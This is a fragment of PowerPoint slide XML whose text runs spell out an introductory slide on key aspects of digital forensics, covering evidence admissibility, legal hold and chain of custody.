                  <a:pt x="4175093" y="102774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4141394" y="73113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4104075" y="47907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4063555" y="27574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4020252" y="12534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3974583" y="3203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3926966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32560" y="3843528"/>
            <a:ext cx="4276725" cy="4577080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4276725" h="4577080">
                <a:moveTo>
                  <a:pt x="3963669" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="312673" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266461" y="3389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222356" y="13235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180843" y="29055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142404" y="50364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107522" y="76681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76681" y="107522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50364" y="142404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29055" y="180843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13235" y="222356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3389" y="266461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="312674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4263847"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3389" y="4310058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13235" y="4354164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29055" y="4395681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50364" y="4434126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76681" y="4469015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107522" y="4499863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142404" y="4526188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180843" y="4547505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222356" y="4563331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266461" y="4573181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312673" y="4576572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3963669" y="4576572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4009882" y="4573181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4053987" y="4563331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4095500" y="4547505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4133939" y="4526188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4168821" y="4499863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4199662" y="4469015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4225979" y="4434126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4247288" y="4395681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4263108" y="4354164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4272954" y="4310058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4276344" y="4263847"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4276344" y="312674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4272954" y="266461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4263108" y="222356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4247288" y="180843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4225979" y="142404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4199662" y="107522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4168821" y="76681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4133939" y="50364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4095500" y="29055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4053987" y="13235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4009882" y="3389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3963669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31967" y="306451"/>
            <a:ext cx="558800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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Aspects</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of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110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Digital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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Forensics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53484" y="760476"/>
            <a:ext cx="7812023" cy="36575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678429" y="1503070"/>
            <a:ext cx="11445240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60470" marR="5080" indent="-3747770">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Digital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forensics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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>collection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evidence</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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rebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>from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computer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standard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format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is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>acceptable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court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law.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49679" y="4100600"/>
            <a:ext cx="3642360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29920" marR="5080" indent="-617855">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="20" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Evidence,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-130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85" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>documentation, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-645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135" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-100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85" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>admissibility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32914" y="5249951"/>
            <a:ext cx="3643629" cy="26993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55600" marR="250825" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="113900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="9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  <a:tab pos="764540" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>documents</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>collection </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-64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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>of	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>latent </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>evidence </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="3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-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(invisible).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37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35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>All</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>collections</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>are</a:t>
            </a:r>
            <a:endParaRPr sz="220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  <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>documented.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3010"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="9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135">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Due</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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dirty="0" sz="2200" spc="-9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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>applied</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-65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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>provide</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>justice</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-90">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> all.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23733" y="4148454"/>
            <a:ext cx="144843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70" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Legal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-165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90" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>hold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84009" y="4865903"/>
            <a:ext cx="3126105" cy="15544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 indent="-635">
              <a:lnSpc>
                <a:spcPct val="113900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="55">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Important </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>evidence </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="3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100">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>kept</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>safely</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-64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100">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>pro</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="75">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>du</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="55">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="3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dirty="0" sz="2200" spc="-7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-85">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>befo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="25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dirty="0" sz="2200" spc="4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dirty="0" sz="2200" spc="-9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-95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dirty="0" sz="2200" spc="65">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>he  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>court.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752326" y="4148454"/>
            <a:ext cx="234505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95" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Chain</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-110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70" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-120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90" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>custody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113769" y="4865903"/>
            <a:ext cx="3619500" cy="1936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1270">
              <a:lnSpc>
                <a:spcPct val="113999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="65">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="85">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>process </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>integrity </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="220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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="80">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>proper </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="65">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>handling </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="4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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>evidence</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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80">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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-30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>collection,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-64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10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>analysis, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>storage, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="105">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="11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-20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>finally</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>presentation.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800855" y="2612135"/>
            <a:ext cx="8719185" cy="759460"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8719185" h="759460">
                <a:moveTo>
                  <a:pt x="8592312" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126492" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77259" y="9941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37052" y="37052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9941" y="77259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="126492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="632460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9941" y="681692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37052" y="721899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77259" y="749010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126492" y="758952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8592312" y="758952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8641544" y="749010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8681751" y="721899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8708862" y="681692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8718804" y="632460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8718804" y="126492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8708862" y="77259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8681751" y="37052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8641544" y="9941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8592312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5193029" y="2795981"/>
            <a:ext cx="59334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45">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>aspects</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2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2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-15">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>digital</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>forensics</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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dirty="0" sz="22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11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dirty="0" sz="2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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>follows: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21755" y="306451"/>
            <a:ext cx="441071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10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Digital</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Forensics</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-145">
